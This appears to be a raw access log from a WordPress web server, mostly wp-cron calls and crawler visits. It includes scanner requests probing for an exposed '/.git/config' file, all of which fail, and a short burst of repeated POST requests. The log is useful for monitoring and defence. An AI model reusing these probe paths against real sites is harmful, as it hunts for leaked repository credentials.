36.133.115.36 - - [11/Sep/2025:22:36:15 +0800] "POST /wp-cron.php?doing_wp_cron=1757601375.9327139854431152343750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
3.99.44.235 - - [11/Sep/2025:22:36:15 +0800] "GET / HTTP/1.1" 301 5 "-" "l9tcpid/v1.1.0"
3.99.44.235 - - [11/Sep/2025:22:36:18 +0800] "GET /.git/config HTTP/1.1" 404 8989 "-" "l9explore/1.2.2"
36.133.115.36 - - [11/Sep/2025:22:38:42 +0800] "POST /wp-cron.php?doing_wp_cron=1757601522.9465301036834716796875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
103.43.191.165 - - [11/Sep/2025:22:38:43 +0800] "POST / HTTP/1.1" 200 151919 "-" "Mozilla/5.0"
103.43.191.165 - - [11/Sep/2025:22:38:44 +0800] "POST / HTTP/1.1" 200 151919 "-" "Mozilla/5.0"
103.43.191.165 - - [11/Sep/2025:22:38:44 +0800] "POST / HTTP/1.1" 200 151919 "-" "Mozilla/5.0"
103.43.191.165 - - [11/Sep/2025:22:38:44 +0800] "POST / HTTP/1.1" 200 151919 "-" "Mozilla/5.0"
36.133.115.36 - - [11/Sep/2025:22:46:42 +0800] "POST /wp-cron.php?doing_wp_cron=1757602002.1962599754333496093750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
178.16.54.224 - - [11/Sep/2025:22:46:42 +0800] "GET / HTTP/1.1" 200 33467 "-" "Go-http-client/1.1"
42.236.101.215 - - [11/Sep/2025:22:47:22 +0800] "GET / HTTP/1.1" 200 39369 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36; 360Spider"
36.133.115.36 - - [11/Sep/2025:22:52:45 +0800] "POST /wp-cron.php?doing_wp_cron=1757602365.0143380165100097656250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [11/Sep/2025:22:52:45 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [11/Sep/2025:22:56:36 +0800] "POST /wp-cron.php?doing_wp_cron=1757602596.4787468910217285156250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
18.61.230.159 - - [11/Sep/2025:22:56:36 +0800] "GET / HTTP/1.1" 301 5 "-" "l9tcpid/v1.1.0"
36.133.115.36 - - [11/Sep/2025:23:10:36 +0800] "POST /wp-cron.php?doing_wp_cron=1757603436.0301029682159423828125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
18.60.217.49 - - [11/Sep/2025:23:10:36 +0800] "GET / HTTP/1.1" 301 5 "-" "l9tcpid/v1.1.0"
18.60.217.49 - - [11/Sep/2025:23:10:37 +0800] "GET /.git/config HTTP/1.1" 404 8989 "-" "l9explore/1.2.2"
36.133.115.36 - - [11/Sep/2025:23:19:35 +0800] "POST /wp-cron.php?doing_wp_cron=1757603975.6631979942321777343750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
17.241.219.185 - - [11/Sep/2025:23:19:35 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.241.219.185 - - [11/Sep/2025:23:19:36 +0800] "GET /logistics HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.241.219.185 - - [11/Sep/2025:23:19:36 +0800] "GET /logistics/ HTTP/1.1" 200 22410 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
